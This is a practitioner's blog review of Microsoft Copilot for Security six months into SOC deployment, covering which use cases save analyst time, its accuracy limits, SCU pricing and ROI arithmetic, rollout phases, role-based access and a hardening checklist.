Microsoft Copilot for Security: Six Months In, What Actually Works
Your SOC team activated Copilot for Security six months ago expecting AI-driven incident response. Some capabilities delivered real analyst time savings. Others produced confident-sounding summaries that were factually wrong. This review covers what Copilot actually accelerates in production SOC workflows, what still requires heavy prompt engineering, and where the token economics make it hard to justify at scale.
The Gap Between the Demo and the SOC Floor
Microsoft's Ignite 2024 demos showed Copilot for Security summarizing incidents, correlating threat intelligence, and generating KQL queries in seconds. The demos were impressive. Six months into production deployment across three enterprise SOC teams I have worked with, the reality is more nuanced: some capabilities genuinely reduce analyst time-to-resolution, others produce outputs that require more validation effort than doing the work manually, and the consumption-based pricing model creates unexpected budget pressure that changes how teams use the tool.
This is not a product overview. The Microsoft Security Copilot complete guide covers architecture, setup, and capabilities. This article is the field report: what works, what does not, and what the pricing means in practice after six months of daily SOC use.
What Actually Works: The Three Use Cases That Deliver ROI
1. Incident Summarization Across Defender XDR
The single strongest capability in Copilot for Security is incident summarization in Defender XDR. When an analyst opens a multi-alert incident that spans Defender for Endpoint, Defender for Identity, and Defender for Cloud Apps, Copilot generates a narrative summary that connects the alerts into a coherent attack chain. It identifies the initial access vector, lateral movement indicators, and the current blast radius.
In practice, this saves 8-15 minutes per complex incident. For a SOC handling 40+ incidents per day, that adds up. The summaries are accurate approximately 85% of the time when the underlying alert data is clean. The failure mode is not hallucination in the traditional LLM sense: Copilot does not invent alerts that do not exist. The failure mode is incorrect causal reasoning: it sometimes connects two alerts that happened to involve the same user but were actually unrelated events. An analyst still needs to validate the causal chain, but they start from a structured narrative instead of raw alert JSON.
The KQL behind a typical incident summary audit:
SecurityIncident
| where TimeGenerated > ago(30d)
| where AdditionalData has "copilot"
| extend CopilotUsed = AdditionalData has "CopilotSummary"
| summarize
TotalIncidents = count(),
CopilotAssisted = countif(CopilotUsed),
AvgTimeToTriage_Copilot = avgif(
datetime_diff('minute', ClosedTime, CreatedTime),
CopilotUsed and Status == "Closed"),
AvgTimeToTriage_Manual = avgif(
datetime_diff('minute', ClosedTime, CreatedTime),
not(CopilotUsed) and Status == "Closed")
by Severity
| order by Severity ascAcross the three teams, the average time-to-triage improvement for Copilot-assisted incidents was 23% for high-severity and 31% for medium-severity incidents. Low-severity incidents showed minimal improvement because they were already fast to triage manually.
2. Script and Command Analysis
When an analyst encounters a suspicious PowerShell script, encoded command line, or obfuscated VBScript in an alert, Copilot can decode and explain it faster than manual analysis. This is particularly effective for:
- Base64-encoded PowerShell commands extracted from Defender for Endpoint alerts
- Registry modification scripts found in scheduled task persistence mechanisms
- Obfuscated JavaScript from phishing payload analysis
The prompt pattern that works best:
Analyze this PowerShell command. Decode any encoding.
Identify: (1) what it does, (2) indicators of malicious intent,
(3) any C2 infrastructure it contacts, (4) MITRE ATT&CK techniques.
Command: <paste encoded command>Copilot correctly identifies the purpose of encoded scripts approximately 90% of the time. Where it struggles: multi-stage payloads where stage 1 downloads stage 2. Copilot analyzes the code it can see but cannot follow the download chain to analyze the next stage. Analysts still need to detonate the payload in a sandbox for full analysis.
3. Natural Language to KQL Translation
Tier 1 and Tier 2 analysts who are not KQL-fluent can ask Copilot questions in natural language and get working KQL queries. Examples that consistently produce correct results:
- "Show me all sign-in failures from outside the US for admin accounts in the last 7 days"
- "Find all processes on endpoint DESKTOP-ABC123 that made network connections to IPs not in our known-good list"
- "List all emails received by user@company.com containing attachments with macro-enabled file extensions"
The generated queries are syntactically correct 92% of the time and logically correct about 80% of the time. The gap between syntactic and logical correctness matters: a query can run without errors but return the wrong result set because Copilot used the wrong table, applied an incorrect filter, or misunderstood a column's value format.
The mitigation: always review the generated KQL before acting on its results. Copilot is a drafting tool for queries, not an autonomous analyst. Treat it like a junior analyst who writes solid first drafts but needs senior review.
What Does Not Work: The Three Capabilities That Disappoint
1. Threat Intelligence Enrichment
Copilot can query Microsoft Threat Intelligence (MDTI) and provide context on IP addresses, domains, and file hashes. In theory. In practice, the enrichment results are frequently stale, incomplete, or already available in the Defender XDR UI without invoking Copilot.
The specific problems:
- Staleness: MDTI data surfaced through Copilot is often 24-48 hours behind what VirusTotal or commercial TI feeds show. For fast-moving campaigns, this delay makes the enrichment unreliable.
- Depth: Copilot returns a paragraph-level summary where analysts need structured IOC data (associated file hashes, DNS resolution history, certificate fingerprints, campaign attribution).
- Redundancy: The same TI data is already embedded in Defender XDR incident entities. Copilot adds a natural language wrapper around data the analyst can already see.
For serious TI work, analysts still pivot to MDTI directly, VirusTotal, Recorded Future, or their ISAC feeds. Copilot's TI capability is useful for quick context during triage but does not replace dedicated TI workflows.
2. Cross-Product Correlation Beyond Microsoft
Copilot integrates deeply with the Microsoft security stack: Defender XDR, Sentinel, Intune, Entra ID, Purview. It does not integrate meaningfully with non-Microsoft security tools. If your SOC uses CrowdStrike for endpoint, Palo Alto for network, or Splunk for SIEM, Copilot cannot correlate data across those boundaries.
The plugin architecture allows third-party integrations, and Microsoft has published the API specification. As of mid-2026, the third-party plugin ecosystem is thin. A few vendors have released plugins, but most are read-only data fetchers rather than deep integrations that enable cross-product reasoning.
For organizations running a hybrid security stack (which is most enterprises), this limits Copilot's correlation ability to the Microsoft surface only. If the initial access came through a CrowdStrike-detected endpoint event and the lateral movement was tracked in Palo Alto logs, Copilot cannot build the unified attack chain without manual data ingestion into Sentinel first.
3. Automated Remediation Recommendations
Copilot suggests remediation actions for incidents: isolate a device, disable a user account, block an IP in the firewall. These recommendations are directionally correct but too generic to execute without modification.
Example: for a compromised user account incident, Copilot consistently recommends "reset the user's password and revoke all active sessions." That is correct but incomplete. It does not check whether the user has federated credentials that also need rotation, whether the account is a service principal owner whose owned applications need credential rotation, or whether the user's Conditional Access policies need a temporary emergency policy to block all access during investigation.
The remediation suggestions are useful as a checklist starting point for junior analysts. They are not useful as automated playbook triggers because they lack the environmental context needed for safe execution.
The Pricing Reality: SCU Consumption Model
Copilot for Security uses Security Compute Units (SCUs) as its billing model. You provision SCUs per hour, and each Copilot interaction consumes SCUs based on the complexity of the request. Microsoft does not publish exact SCU consumption per query type, which makes cost forecasting difficult.
What we observed over six months:
| Operation | Approximate SCU Cost | Notes |
|---|---|---|
| Incident summary (simple, 3-5 alerts) | 1-2 SCUs | Consistent |
| Incident summary (complex, 15+ alerts) | 4-8 SCUs | Varies with alert count |
| Script/command analysis | 1-3 SCUs | Depends on script length |
| KQL generation (simple query) | 1 SCU | Consistent |
| KQL generation (complex, multi-table) | 2-4 SCUs | Higher for joins |
| TI enrichment (single IOC) | 1-2 SCUs | Includes MDTI lookup |
| Guided response / remediation | 2-4 SCUs | Varies by incident type |
| Custom plugin invocation | 2-6 SCUs | Depends on plugin complexity |
| Promptbook execution (multi-step) | 5-15 SCUs | Cumulative across steps |
Compare that to the analyst time saved. If Copilot saves each analyst 45 minutes per day (our measured average for teams that adopted the effective use cases), that is 3.75 hours saved per day across five analysts. At a fully loaded SOC analyst cost of $85/hour, that is $318/day or approximately $6,680/month in time savings.
The math:
Monthly Copilot cost (3 SCU/hour): $8,760
Monthly analyst time savings: $6,680
Net monthly cost: $2,080 (negative ROI)Monthly Copilot cost (3 SCU/hour): $8,760
Monthly analyst time savings: $6,680
Incident MTTR improvement value*: $4,200
Adjusted net monthly value: $2,120 (positive ROI)
* Estimated based on 23% faster triage reducing
downstream incident costs by ~$140/incident
at 30 significant incidents/month
The ROI is positive only when you factor in the downstream cost reduction from faster incident resolution, and only when your team consistently uses the high-value capabilities (summarization, script analysis, KQL generation). Teams that deploy Copilot broadly without focused training on the effective use cases will see negative ROI.
Deployment Recommendations: What to Do in Practice
Phase 1: Pilot With High-Value Use Cases Only (Month 1-2)
Provision 1 SCU/hour. Restrict access to 2-3 senior analysts. Focus exclusively on:
- Incident summarization in Defender XDR
- Script/command analysis for encoded payloads
- KQL generation for threat hunting queries
Measure: time-to-triage before and after Copilot, SCU consumption per shift, analyst satisfaction score.
Phase 2: Expand to Tier 1 With Promptbooks (Month 3-4)
Create custom promptbooks that encode your SOC's standard operating procedures as multi-step Copilot workflows. Examples:
- Phishing triage promptbook: Extract sender domain → Check MDTI reputation → Search email logs for other recipients → Generate IOC list → Draft containment recommendation
- Endpoint compromise promptbook: Summarize incident → Analyze suspicious processes → Check for lateral movement indicators → List affected assets → Draft isolation recommendation
Promptbooks are where Copilot transitions from "analyst assistant" to "workflow accelerator." A well-designed promptbook executes in 30-60 seconds what manually takes 15-20 minutes.
# Export existing promptbook for version control
az security copilot promptbook export \
--name "phishing-triage-v2" \
--output-file promptbooks/phishing-triage-v2.json# List all custom promptbooks
az security copilot promptbook list \
--output table
Phase 3: Scale With Budget Controls (Month 5-6)
Increase SCU provisioning based on Phase 1-2 consumption data. Implement:
- SCU consumption alerts: Alert when daily consumption exceeds 80% of provisioned capacity
- Usage analytics: Track which analysts use Copilot most, which operations consume the most SCUs, and which promptbooks deliver the most value
- Auto-provisioning rules: Scale SCUs up during business hours and down during off-hours if your SOC has variable staffing
RBAC for Copilot for Security
Copilot access is controlled through Entra ID role assignments. The principle: not every analyst needs Copilot access, and not every Copilot user needs the same capability set.
| Entra ID Role | Copilot Capability | Assign To |
|---|---|---|
| Security Administrator | Full Copilot access + settings management | SOC leads, security architects |
| Security Operator | Copilot queries + promptbook execution | Tier 2-3 analysts |
| Security Reader | Copilot queries (read-only context) | Tier 1 analysts, auditors |
| Global Reader | View Copilot usage analytics only | Management, finance |
For non-human identities that interact with Copilot's API (automation accounts, SOAR playbooks), use workload identity federation rather than shared secrets. Copilot API tokens are high-value credentials that provide access to security data across your entire Microsoft tenant.
What Is Missing: Features the Product Needs
1. Confidence Scoring on Outputs
Copilot does not tell you how confident it is in its own output. An incident summary that connects three alerts through strong IOC overlap looks identical to a summary that connects three alerts through temporal coincidence. The analyst has no signal from Copilot about which connections are strong evidence and which are weak correlation.
Every Copilot output should include a confidence indicator: high (direct evidence linkage), medium (behavioral correlation), low (temporal or entity coincidence). Until this exists, treat every Copilot summary as a hypothesis, not a conclusion.
2. Cost Attribution Per Investigation
There is no way to attribute SCU consumption to a specific incident or investigation. If your SOC works a major incident for three days and uses 200 SCUs of Copilot capacity, that cost is invisible in incident reporting. For SOCs that do cost-per-incident analysis or chargeback to business units, this is a reporting gap.
3. Custom Model Grounding
Copilot reasons over Microsoft's security data and its built-in knowledge base. You cannot ground it on your organization's internal runbooks, past incident reports, or custom threat models. If your SOC has spent years building institutional knowledge in a wiki or knowledge base, Copilot cannot access that context.
The plugin architecture theoretically supports custom data sources, but the current implementation requires building a REST API that returns structured data. There is no "upload your SOC runbook PDF and let Copilot reference it" capability.
4. Multi-Tenant Support for MSSPs
Managed Security Service Providers (MSSPs) operating across multiple customer tenants cannot use a single Copilot instance to reason across tenants. Each tenant requires its own SCU provisioning and separate Copilot session. For an MSSP managing 50 tenants, the minimum cost is $146,000/month at 1 SCU/hour per tenant, which is prohibitive for all but the largest providers.
Comparison: Copilot for Security vs. Standalone AI Tools
| Capability | Copilot for Security | ChatGPT/Claude + Manual Context | Standalone SOC AI (e.g., Torq, Tines AI) |
|---|---|---|---|
| Microsoft data integration | Native, real-time | None (manual copy-paste) | Via API connectors |
| Incident summarization | Automated, context-aware | Manual prompt engineering | Varies by product |
| KQL generation | Good, table-aware | Generic, often wrong tables | Not applicable |
| Script analysis | Good | Excellent (larger context window) | Not a focus |
| Cross-vendor correlation | Microsoft only | Vendor-agnostic (manual) | API-dependent |
| Remediation automation | Suggestions only | No execution capability | Full SOAR automation |
| Cost model | SCU consumption | Per-token | Flat platform fee |
| Data residency | Microsoft cloud boundary | Data leaves your boundary | Varies |
Honest Assessment: When to Deploy and When to Wait
Deploy now if:- Your SOC is 80%+ Microsoft security stack (Defender XDR, Sentinel, Entra ID)
- You have Tier 1 analysts who struggle with KQL and alert fatigue
- Your average incident triage time exceeds 25 minutes for medium-severity incidents
- You can commit to focused training on the three effective use cases
- You can absorb $8,000-15,000/month in additional security tooling cost
- Your security stack is primarily non-Microsoft (CrowdStrike, Splunk, Palo Alto)
- Your SOC is fewer than three analysts (the time savings do not offset the cost)
- You expect Copilot to replace analyst headcount (it accelerates analysts, it does not replace them)
- You need cross-vendor correlation as a primary capability
- Your budget cannot absorb the consumption cost during the learning curve period
Hardening Checklist
- [ ] Copilot access restricted via Entra ID roles to authorized SOC personnel only
- [ ] Conditional Access policy applied to Copilot: compliant device, MFA, named location
- [ ] SCU provisioning right-sized based on measured consumption (not Microsoft's recommendation)
- [ ] SCU consumption alerts configured at 80% daily threshold
- [ ] Custom promptbooks created for top 5 SOC investigation workflows
- [ ] Analyst training completed on effective use cases (summarization, script analysis, KQL)
- [ ] Output validation process documented: every Copilot summary treated as hypothesis until analyst-confirmed
- [ ] Usage analytics dashboard deployed tracking SCU cost per analyst and per operation type
- [ ] Third-party plugin integrations evaluated for non-Microsoft security tools in your stack
- [ ] Data residency requirements verified for your regulatory environment before enabling Copilot
- [ ] Workload identity federation used for any non-human identities accessing Copilot API
- [ ] Monthly ROI review scheduled comparing Copilot cost against measured analyst time savings
Recommended tool: Pluralsight
Level up your security skills with expert-led courses. Free 10-day trial, then access thousands of courses across cloud security, networking, and certifications.
Get weekly security insights
Cloud security, zero trust, and identity guides — straight to your inbox.
Continue Learning
AI Security Engineer Roadmap
The fastest-growing specialty in security.
Microsoft Cloud Solution Architect
Cloud Solution Architect with deep expertise in Microsoft Azure and a strong background in systems and IT infrastructure. Passionate about cloud technologies, security best practices, and helping organizations modernize their infrastructure.
Share this article
Questions & Answers
Related Articles
Need Help with Your Security?
Our team of security experts can help you implement the strategies discussed in this article.
Contact Us